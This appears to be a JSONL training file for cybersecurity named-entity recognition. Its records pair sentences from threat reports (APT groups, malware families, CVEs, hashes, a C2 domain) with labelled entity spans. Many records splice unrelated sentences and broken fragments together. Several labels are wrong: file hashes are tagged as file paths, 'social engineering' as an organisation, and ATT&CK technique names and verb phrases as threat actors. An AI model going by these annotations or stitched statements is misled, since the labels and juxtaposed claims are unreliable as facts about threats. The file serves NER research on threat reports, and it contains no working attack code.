Suckfly conducted a multistage attack against an e-commerce organization based in India . potentially leaked Hamas document detailing Hamas 32nd anniversary expenses in different regions in the Palestinian Territories 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb . • Other actors merged into this group : 6 UNC1878 is a financially motivated group that monetizes their intrusions by extorting their victims following the deployment of RYUK ransomware .", "spans": {"ORGANIZATION: e-commerce organization": [[213, 236]], "FILEPATH: 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb": [[382, 446]], "THREAT_ACTOR: UNC1878": [[491, 498]], "THREAT_ACTOR: extorting their victims following the deployment": [[567, 615]], "TOOL: RYUK ransomware": [[619, 634]]}, "info": {"id": "cyberner_stix_train_002616", "source": "cyberner_stix_train"}} {"text": "Overlay attack Ginp uses the Accessibility Service to check which application runs is the foreground . The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe . It opens a TCP port and receives commands from a remote attacker .", "spans": {"THREAT_ACTOR: Visma": [[107, 112]]}, "info": {"id": "cyberner_stix_train_002617", "source": "cyberner_stix_train"}} {"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . 
menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns .", "spans": {"MALWARE: Trojan": [[86, 92]], "MALWARE: DDNS and actor-registered domains": [[222, 255]]}, "info": {"id": "cyberner_stix_train_002618", "source": "cyberner_stix_train"}} {"text": "Successful execution of the macro within the malicious document results in the installation of APT28 ’s signature GAMEFISH malware .", "spans": {"TOOL: macro": [[28, 33]], "THREAT_ACTOR: APT28": [[95, 100]], "MALWARE: GAMEFISH": [[114, 122]]}, "info": {"id": "cyberner_stix_train_002619", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . it reports to was created on August 10 , 2011 .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]]}, "info": {"id": "cyberner_stix_train_002620", "source": "cyberner_stix_train"}} {"text": "Domain Name : Spoofed Site ntg-sa.com The domain ntg-sa.com appears to spoof the legit domain ntg.sa.com associated with the Namer Trading Group .", "spans": {"URL: ntg-sa.com": [[27, 37], [49, 59]], "URL: ntg.sa.com": [[94, 104]], "ORGANIZATION: Namer Trading Group": [[125, 144]]}, "info": {"id": "cyberner_stix_train_002621", "source": "cyberner_stix_train"}} {"text": "Activation cycle As we have explained above , the malware has several defence mechanisms . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . The script is downloading a second stage payload via the Microsoft tool msiexec . 
YARA Rules", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[95, 121]], "MALWARE: malicious files": [[169, 184]], "ORGANIZATION: government": [[250, 260]], "ORGANIZATION: MalwareBytes": [[285, 297]], "ORGANIZATION: Microsoft": [[357, 366]], "TOOL: msiexec": [[372, 379]]}, "info": {"id": "cyberner_stix_train_002622", "source": "cyberner_stix_train"}} {"text": "Payload : The malware ; software that will enable the attacker to make use of ( control , exfiltrate data from , or download more software to ) the target computer .", "spans": {}, "info": {"id": "cyberner_stix_train_002623", "source": "cyberner_stix_train"}} {"text": "However , the existence of threats like ViperRAT and Pegasus , the most sophisticated piece of mobile surveillanceware we ’ ve seen to date , are evidence that attackers are targeting mobile devices . this library includes two drivers compiled on August 22 and September 4 , 2014 . ZxShell plugins are parsed and loaded with the AnalyseAndLoadPlugins function . OilRig uses two initial access vectors spearphishing and through ITbrain , which is a remote administration software , used in conjunction with the remote access tool TeamViewer .", "spans": {"MALWARE: ViperRAT": [[40, 48]], "MALWARE: Pegasus": [[53, 60]], "MALWARE: ZxShell": [[282, 289]], "THREAT_ACTOR: OilRig": [[362, 368]], "TOOL: ITbrain": [[427, 434]], "TOOL: TeamViewer": [[529, 539]]}, "info": {"id": "cyberner_stix_train_002624", "source": "cyberner_stix_train"}} {"text": "Instead of compiling a different server for each client , our server uses the code from within the client to communicate with it .", "spans": {"TOOL: server": [[33, 39]], "TOOL: our server": [[58, 68]]}, "info": {"id": "cyberner_stix_train_002625", "source": "cyberner_stix_train"}} {"text": "] 26/html2/arc92/au483x.zip hxxp : //94.130.106 [ . 
Based on these observations , as well as MuddyWater 's history of targeting Turkey-based entities , we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group . Rancor , a cyber espionage group active since at least 2017 , continues to conduct targeted attacks in Southeast Asia E-LOC and has been found using an undocumented , custom malware family – which we ’ve dubbed Dudell – to download a second stage payload once its malicious macro is executed . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"THREAT_ACTOR: MuddyWater": [[93, 103], [229, 239]], "THREAT_ACTOR: threat actor group": [[240, 258]], "THREAT_ACTOR: Rancor": [[261, 267]], "MALWARE: Dudell": [[472, 478]], "ORGANIZATION: CrowdStrike": [[581, 592]], "VULNERABILITY: CVE-2022 - 41080": [[673, 689]]}, "info": {"id": "cyberner_stix_train_002626", "source": "cyberner_stix_train"}} {"text": "Targeting individuals linked to presidential campaigns could represent an intelligence ‘ long game ,' as establishing access to potential U.S. administration staff before they are appointed could be easier than targeting them when they are established in the White House .", "spans": {"ORGANIZATION: White House": [[259, 270]]}, "info": {"id": "cyberner_stix_train_002627", "source": "cyberner_stix_train"}} {"text": "Deceptively , the app was listed in the Education section . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . 
The Lazarus Group employs a variety of RATs that operate in both client mode and server mode .", "spans": {"THREAT_ACTOR: It": [[60, 62]], "TOOL: FlawedAmmyy payload": [[134, 153]], "THREAT_ACTOR: Lazarus Group": [[160, 173]], "MALWARE: RATs": [[195, 199]]}, "info": {"id": "cyberner_stix_train_002628", "source": "cyberner_stix_train"}} {"text": "RuMMS Code Analysis All RuMMS samples share the same behaviors , major parts of which are shown in Figure 1 . This realization suggests that the OilRig threat group will continue to use their delivery documents for extended periods with subtle modifications to remain effective . The below image shows the information about the sample before and after the cleaning . The challenge of investigating a vulnerable appliance for the exploitation CVE-2023 - 4966 is that the webserver running on the appliance does not record requests ( or errors ) to the vulnerable endpoint .", "spans": {"MALWARE: RuMMS": [[0, 5], [24, 29]], "THREAT_ACTOR: OilRig": [[145, 151]], "THREAT_ACTOR: threat group": [[152, 164]], "TOOL: delivery documents": [[192, 210]], "VULNERABILITY: CVE-2023 - 4966": [[442, 457]]}, "info": {"id": "cyberner_stix_train_002629", "source": "cyberner_stix_train"}} {"text": "However , it has begun to target users all around the world , especially users in countries like China , Taiwan , France , Switzerland , Germany , United Kingdom , United States , and others . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma . 
The group has carried out attacks most months since December 2017 .", "spans": {"ORGANIZATION: Rapid7": [[193, 199]], "THREAT_ACTOR: APT10": [[290, 295]]}, "info": {"id": "cyberner_stix_train_002630", "source": "cyberner_stix_train"}} {"text": "Filename : ntslwin.exe MD5 : a13c864980159cd9bdc94074b2389dda Filename : ~de03fc12a.docm MD5 : 9d703d31795bac83c4dd90527d149796 .", "spans": {"FILEPATH: ntslwin.exe": [[11, 22]], "FILEPATH: a13c864980159cd9bdc94074b2389dda": [[29, 61]], "FILEPATH: ~de03fc12a.docm": [[73, 88]], "FILEPATH: 9d703d31795bac83c4dd90527d149796": [[95, 127]]}, "info": {"id": "cyberner_stix_train_002631", "source": "cyberner_stix_train"}} {"text": "The Sofacy group ( AKA APT28 , Fancy Bear , STRONTIUM , Sednit , Tsar Team , Pawn Storm ) is a well-known adversary that remains highly active in the new calendar year of 2018 .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "THREAT_ACTOR: APT28": [[23, 28]], "THREAT_ACTOR: Fancy Bear": [[31, 41]], "THREAT_ACTOR: STRONTIUM": [[44, 53]], "THREAT_ACTOR: Sednit": [[56, 62]], "THREAT_ACTOR: Tsar Team": [[65, 74]], "THREAT_ACTOR: Pawn Storm": [[77, 87]]}, "info": {"id": "cyberner_stix_train_002632", "source": "cyberner_stix_train"}} {"text": "Strazzere 's colleague , Jon Sawyer , suggested on Twitter that the vulnerabilities might have not been there by mistake , but rather included as intentionally coded backdoors . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . 
Gh0stRAt Downloader : ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 .", "spans": {"ORGANIZATION: Twitter": [[51, 58]], "THREAT_ACTOR: groups": [[193, 199]], "VULNERABILITY: CVE-2018-0798": [[213, 226]], "MALWARE: Gh0stRAt Downloader": [[409, 428]], "FILEPATH: ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974": [[431, 495]]}, "info": {"id": "cyberner_stix_train_002633", "source": "cyberner_stix_train"}} {"text": "FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Corkow": [[164, 170]], "ORGANIZATION: users": [[189, 194]]}, "info": {"id": "cyberner_stix_train_002634", "source": "cyberner_stix_train"}} {"text": "Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . 
After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers .", "spans": {"ORGANIZATION: social engineering": [[46, 64]], "THREAT_ACTOR: MuddyWater": [[93, 103]], "FILEPATH: SWAnalytics": [[231, 242]]}, "info": {"id": "cyberner_stix_train_002635", "source": "cyberner_stix_train"}} {"text": "This list is expected to expand : Package name Application name com.android.vending Play Market com.boursorama.android.clients Boursorama Banque com.caisseepargne.android.mobilebanking Banque com.chase.sig.android Chase Mobile com.clairmail.fth Fifth Third Mobile Banking com.connectivityapps.hotmail Connect for Hotmail com.google.android.gm Gmail com.imo.android.imoim imo free video calls and chat com.infonow.bofa Bank of America This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . 
Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": {"SYSTEM: Play Market": [[84, 95]], "SYSTEM: Banque": [[138, 144], [185, 191]], "SYSTEM: Chase Mobile": [[214, 226]], "SYSTEM: Fifth Third Mobile Banking": [[245, 271]], "SYSTEM: Connect for Hotmail": [[301, 320]], "SYSTEM: Gmail": [[343, 348]], "SYSTEM: imo": [[371, 374]], "SYSTEM: Bank of America": [[418, 433]], "THREAT_ACTOR: SectorJ04": [[550, 559]], "ORGANIZATION: companies": [[721, 730]], "ORGANIZATION: Symantec": [[754, 762]], "THREAT_ACTOR: BRONZE BUTLER": [[831, 844]]}, "info": {"id": "cyberner_stix_train_002636", "source": "cyberner_stix_train"}} {"text": "The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: CVE-2012-0158": [[59, 72]], "THREAT_ACTOR: Turla": [[115, 120]], "TOOL: emails": [[189, 195]], "ORGANIZATION: German Foreign Office staff": [[208, 235]]}, "info": {"id": "cyberner_stix_train_002637", "source": "cyberner_stix_train"}} {"text": "Use mobile threat detection solutions for enhanced security . The malicious attachments purported to be invitations or drafts of the agenda for the conference . 
The threat actors associated with DRAGONFISH have previously focused their campaigns on targets in Southeast Asia , specifically those located in countries near the South China Sea .", "spans": {"MALWARE: malicious attachments": [[66, 87]], "TOOL: invitations": [[104, 115]], "TOOL: drafts of the agenda": [[119, 139]], "THREAT_ACTOR: actors": [[172, 178]], "THREAT_ACTOR: DRAGONFISH": [[195, 205]]}, "info": {"id": "cyberner_stix_train_002638", "source": "cyberner_stix_train"}} {"text": "First of all the new package name is com.google.services , which can easily be confused with a legitimate Google service . \" With our latest research we now see how Greenbug has shifted away from HTTP-based C2 communication with Ismdoor . The THREEBYTE spear phishing incident ( while not yet attributed ) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12 : The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors ; Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": {"ORGANIZATION: Google": [[106, 112]], "TOOL: Ismdoor": [[229, 236]], "MALWARE: THREEBYTE": [[243, 252]], "MALWARE: HIGHTIDE": [[358, 366]], "THREAT_ACTOR: APT12": [[390, 395]], "MALWARE: THREEBYTE backdoor": [[402, 420]], "MALWARE: HIGHTIDE backdoors": [[453, 471]], "THREAT_ACTOR: APT29": [[492, 497]]}, "info": {"id": "cyberner_stix_train_002639", "source": "cyberner_stix_train"}} {"text": "RCSession — This basic RAT is installed via DLL side-loading , and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions .", "spans": {"MALWARE: RCSession": [[0, 9]], "TOOL: DLL": [[44, 47]], "ORGANIZATION: CTU": [[67, 70]], "THREAT_ACTOR: BRONZE PRESIDENT": [[92, 108]]}, "info": {"id": "cyberner_stix_train_002640", "source": "cyberner_stix_train"}} {"text": "In addition , we uncovered the IMEIs of the targeted individuals ( IMEIs will not be shared publicly for the privacy and 
safety of the victims ) as well as the types of exfiltrated content . Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal . At startup , Svchost.exe checks the services part of the registry and constructs a list of services to load . At the end of There is a call to the main function of the malware that contains all its functionality .", "spans": {"TOOL: Carbon": [[235, 241]], "FILEPATH: Svchost.exe": [[310, 321]]}, "info": {"id": "cyberner_stix_train_002641", "source": "cyberner_stix_train"}} {"text": "This is a very simple process , which is replacing their update file on SD card with its own malicious payload . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Unlike the files described earlier , these executables are never written to the filesystem . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": {"MALWARE: Careto": [[172, 178]], "SYSTEM: WordPress site": [[470, 484]]}, "info": {"id": "cyberner_stix_train_002642", "source": "cyberner_stix_train"}} {"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . 
Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host .", "spans": {"MALWARE: Okrum": [[52, 57]], "THREAT_ACTOR: Clever Kitten": [[252, 265]]}, "info": {"id": "cyberner_stix_train_002643", "source": "cyberner_stix_train"}} {"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims .", "spans": {"MALWARE: malicious.DOC": [[86, 99]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[119, 158]], "VULNERABILITY: CVE-2012-0158": [[161, 174]], "THREAT_ACTOR: Buhtrap": [[204, 211]], "VULNERABILITY: exploit": [[247, 254]], "VULNERABILITY: CVE-2019-1132": [[257, 270]]}, "info": {"id": "cyberner_stix_train_002644", "source": "cyberner_stix_train"}} {"text": "Thanks to that project , we were able to extract his Facebook profile – which lists his studies at the aforementioned university . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor . 
SHA256 : 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b .", "spans": {"ORGANIZATION: Facebook": [[53, 61]], "MALWARE: Hancitor": [[280, 288]], "FILEPATH: 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b": [[300, 364]]}, "info": {"id": "cyberner_stix_train_002645", "source": "cyberner_stix_train"}} {"text": "CozyDuke is not simply a malware toolset ; rather , it is a modular malware platform formed around a core backdoor component .", "spans": {"MALWARE: CozyDuke": [[0, 8]], "TOOL: backdoor": [[106, 114]]}, "info": {"id": "cyberner_stix_train_002646", "source": "cyberner_stix_train"}} {"text": "Like the ChinaChopper web shell , the OwaAuth web shell requires a password .", "spans": {"MALWARE: ChinaChopper": [[9, 21]], "TOOL: web shell": [[22, 31], [46, 55]], "MALWARE: OwaAuth": [[38, 45]]}, "info": {"id": "cyberner_stix_train_002647", "source": "cyberner_stix_train"}} {"text": "More details on the new USB stealers are available in the section on technical analysis .", "spans": {"TOOL: USB": [[24, 27]]}, "info": {"id": "cyberner_stix_train_002648", "source": "cyberner_stix_train"}} {"text": "In addition to being signed with a stolen certificate , the identified hacktools had been used in suspicious activity against a US based health provider operating in India .", "spans": {}, "info": {"id": "cyberner_stix_train_002649", "source": "cyberner_stix_train"}} {"text": "Compromising safety systems provides little value outside of disrupting operations .", "spans": {}, "info": {"id": "cyberner_stix_train_002650", "source": "cyberner_stix_train"}} {"text": "Public cloud infrastructure is one of the main targets for Rocke . 
The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron .", "spans": {"THREAT_ACTOR: Rocke": [[59, 64]], "ORGANIZATION: IT": [[120, 122]], "ORGANIZATION: real estate/investment companies": [[127, 159]], "THREAT_ACTOR: Wild Neutron": [[238, 250]]}, "info": {"id": "cyberner_stix_train_002651", "source": "cyberner_stix_train"}} {"text": "The packer , besides making the static analysis more complex , will break the standard debugger . The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 . Recently , our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved , that we believe is connected to this case as well . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for • None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services • None Consider application - level controls such as web application firewalls .", "spans": {"THREAT_ACTOR: threat actor": [[102, 114]], "THREAT_ACTOR: threat actors": [[242, 255]], "THREAT_ACTOR: APT10": [[326, 331]], "ORGANIZATION: ESET": [[365, 369]], "THREAT_ACTOR: BARIUM": [[419, 425]], "TOOL: CrowdStrike Falcon": [[498, 516]], "SYSTEM: Monitor Exchange servers": [[644, 668]], "ORGANIZATION: CrowdStrike Services": [[768, 788]]}, "info": {"id": "cyberner_stix_train_002652", "source": "cyberner_stix_train"}} {"text": "The code implementation again seems that it has been added for testing purposes only . Trochilus RAT activity was discovered during both months of October and November 2015 . 
The backdoor connects to a command and control server at icc.ignorelist.com . Enterprise T1082 System Information Discovery During the SolarWinds Compromise , APT29 used fsutil to check available free space before executing actions that might create large files on disk .", "spans": {"DOMAIN: icc.ignorelist.com": [[232, 250]], "THREAT_ACTOR: the SolarWinds Compromise": [[306, 331]], "THREAT_ACTOR: APT29": [[334, 339]]}, "info": {"id": "cyberner_stix_train_002653", "source": "cyberner_stix_train"}} {"text": "10002B55: Applicate Most of the strings inside the binary are encrypted using a homebrew XOR-based algorithm and reversed .", "spans": {}, "info": {"id": "cyberner_stix_train_002654", "source": "cyberner_stix_train"}} {"text": "Triada ’ s functionality allows it to modify those messages , so the money is sent not to some app developer , but to the malware operators . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . In addition to these instances , multiple Qatari organizations were the subject to spear phishing attacks carrying Helminth samples earlier this year .", "spans": {"MALWARE: Triada": [[0, 6]], "THREAT_ACTOR: Wild Neutron": [[142, 154]], "TOOL: stolen code signing certificate": [[181, 212]], "ORGANIZATION: electronics": [[236, 247]], "VULNERABILITY: Flash Player exploit": [[274, 294]], "ORGANIZATION: Qatari organizations": [[339, 359]], "MALWARE: Helminth samples": [[412, 428]]}, "info": {"id": "cyberner_stix_train_002655", "source": "cyberner_stix_train"}} {"text": "But the malicious ip file does not contain any methods from the original ip file . On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage . RevengeHotels : a089efd7dd9180f9b726594bb6cf81ae . 
This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": {"ORGANIZATION: Cisco 's Talos": [[103, 117]], "THREAT_ACTOR: RevengeHotels": [[247, 260]], "FILEPATH: a089efd7dd9180f9b726594bb6cf81ae": [[263, 295]]}, "info": {"id": "cyberner_stix_train_002656", "source": "cyberner_stix_train"}} {"text": "The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": {"TOOL: BitPaymer": [[94, 103]], "THREAT_ACTOR: ScarCruft": [[163, 172]]}, "info": {"id": "cyberner_stix_train_002657", "source": "cyberner_stix_train"}} {"text": "In the dangerous module lies a kill switch logic which looks for the keyword “ infect ” . We dove deeper into Confucius' operations—namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns . We have confirmed more than 20 hotels that are victims of the group , located in eight states in Brazil , but also in other countries such as Argentina , Bolivia , Chile , Costa Rica , France , Italy , Mexico , Portugal , Spain , Thailand and Turkey . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": {}, "info": {"id": "cyberner_stix_train_002658", "source": "cyberner_stix_train"}} {"text": "While commercial solutions like Symantec pcAnywhere provide a larger feature-set , Winexe is lightweight , and doesn’t require any installation or configuration .", "spans": {"ORGANIZATION: Symantec": [[32, 40]], "TOOL: Winexe": [[83, 89]]}, "info": {"id": "cyberner_stix_train_002659", "source": "cyberner_stix_train"}} {"text": "In the last few weeks , FormBook was seen downloading other malware families such as NanoCore . 
While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"MALWARE: FormBook": [[24, 32]], "MALWARE: NanoCore": [[85, 93]], "TOOL: Word": [[226, 230]], "ORGANIZATION: social engineering campaigns": [[297, 325]], "ORGANIZATION: women 's rights activists": [[334, 359]]}, "info": {"id": "cyberner_stix_train_002660", "source": "cyberner_stix_train"}} {"text": "INDRIK SPIDER uses file sharing platforms to distribute the BitPaymer decryptor . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[0, 13]], "TOOL: file sharing platforms": [[19, 41]], "TOOL: BitPaymer decryptor": [[60, 79]], "ORGANIZATION: Kaspersky Lab": [[97, 110], [238, 251]], "VULNERABILITY: zero-day": [[176, 184]]}, "info": {"id": "cyberner_stix_train_002661", "source": "cyberner_stix_train"}} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . 
Mac OS X will run the application if it passes certificates .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]], "SYSTEM: Mac OS X": [[221, 229]]}, "info": {"id": "cyberner_stix_train_002662", "source": "cyberner_stix_train"}} {"text": "More apps could be added to the grabber target list in the future , such as the ones that were targeted in older versions : Facebook WhatsApp Skype Twitter Chrome Instagram Snapchat Viber The following screenshot shows the generic card grabber overlay screen : Ginp generic grabber The current active target list is available in the appendix , containing a total of 24 unique targets . On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild . The researcher of the company analyzed multiple threats , including Invader , Nioupale (Daserf ) and Hdoor found in an attack against an Asian financial institution .", "spans": {"SYSTEM: Facebook": [[124, 132]], "SYSTEM: WhatsApp": [[133, 141]], "SYSTEM: Skype": [[142, 147]], "SYSTEM: Twitter": [[148, 155]], "SYSTEM: Chrome": [[156, 162]], "SYSTEM: Instagram": [[163, 172]], "SYSTEM: Snapchat": [[173, 181]], "SYSTEM: Viber": [[182, 187]], "MALWARE: Ginp": [[261, 265]], "THREAT_ACTOR: APT10": [[408, 413]], "TOOL: Trochilus": [[455, 464]], "MALWARE: Invader": [[682, 689]], "MALWARE: Nioupale": [[692, 700]], "MALWARE: Hdoor": [[715, 720]]}, "info": {"id": "cyberner_stix_train_002663", "source": "cyberner_stix_train"}} {"text": "The Red Alert Payload Once installed , the malware requests Device Administrator privileges . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . Some of these appear to be foreign diplomatic entities based in the . 
They once attacked a game server to illicitly farm in - game currency ( “ gaming gold ” , which also has real - world value ) and stole source codes of online game projects .", "spans": {"MALWARE: Red Alert Payload": [[4, 21]], "THREAT_ACTOR: APT37": [[106, 111]], "ORGANIZATION: game server": [[370, 381]]}, "info": {"id": "cyberner_stix_train_002664", "source": "cyberner_stix_train"}} {"text": "We observe many behavioral similarities and unique strings across both the native-Downeks versions , and the new .NET Downeks versions .", "spans": {"MALWARE: native-Downeks": [[75, 89]], "TOOL: .NET": [[113, 117]]}, "info": {"id": "cyberner_stix_train_002665", "source": "cyberner_stix_train"}} {"text": "Instead ,the payload is executed in standalone mode by rundll32.exe .", "spans": {"FILEPATH: rundll32.exe": [[55, 67]]}, "info": {"id": "cyberner_stix_train_002666", "source": "cyberner_stix_train"}} {"text": "Figure 11 . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . In this instance , the payload is fully contained within the image’s pixel color codes , leaving no remaining data beyond the IEND marker . 
DOUBLEDRAG attempts to download a second - stage obfuscated PowerShell memory - only dropper , which Mandiant tracks as DOUBLEDROP , that will launch a backdoor into memory .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[12, 43]], "ORGANIZATION: CTU": [[46, 49]], "ORGANIZATION: organization": [[124, 136]], "TOOL: DOUBLEDRAG": [[301, 311]], "ORGANIZATION: Mandiant": [[402, 410]], "TOOL: DOUBLEDROP": [[421, 431]]}, "info": {"id": "cyberner_stix_train_002667", "source": "cyberner_stix_train"}} {"text": "If the connection test is successful , the malware runs and attempts to communicate with the C&C domain over ports 443 and 8443 .", "spans": {"TOOL: C&C": [[93, 96]]}, "info": {"id": "cyberner_stix_train_002668", "source": "cyberner_stix_train"}} {"text": "The C2 can also use WebSocket as a backup communication channel . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists .", "spans": {"MALWARE: Mimikatz": [[66, 74]], "THREAT_ACTOR: APT38": [[171, 176]], "ORGANIZATION: financial institutions": [[292, 314]], "THREAT_ACTOR: cyber heists": [[357, 369]]}, "info": {"id": "cyberner_stix_train_002669", "source": "cyberner_stix_train"}} {"text": "Technical Analysis “ Agent Smith ” has a modular structure and consists of the following modules : Loader Core Boot Patch AdSDK Updater As stated above , the first step of this infection chain is the dropper . Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign . More importantly , one year ’s worth of intelligence helped us gain insight not only into the goals and motivations of Dexphot ’s authors , but of cybercriminals in general . 
Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": {"MALWARE: Agent Smith": [[21, 32]], "ORGANIZATION: Unit 42": [[210, 217]], "TOOL: Bookworm": [[266, 274]], "MALWARE: Dexphot": [[479, 486]], "THREAT_ACTOR: Spearphishing Attachment APT29": [[535, 565]], "THREAT_ACTOR: Spearphishing Link APT29": [[680, 704]], "THREAT_ACTOR: Spearphishing via Service APT29": [[837, 868]]}, "info": {"id": "cyberner_stix_train_002670", "source": "cyberner_stix_train"}} {"text": "The malware was discovered by Palo Alto Networks Unit 42 and ClearSky Cyber Security , and publicized in April 2017 in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": {"ORGANIZATION: Palo Alto Networks": [[30, 48]], "ORGANIZATION: Unit 42": [[49, 56]], "ORGANIZATION: ClearSky Cyber Security": [[61, 84]], "MALWARE: KASPERAGENT": [[165, 176]], "MALWARE: MICROPSIA": [[181, 190]]}, "info": {"id": "cyberner_stix_train_002671", "source": "cyberner_stix_train"}} {"text": "Additionally , we have determined that though original reports of this story attribute this surveillanceware tool to Hamas , this may not be the case , as we demonstrate below . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus . Each value is a REG_MULTI_SZ value and contains the services that run under that Svchost group . 
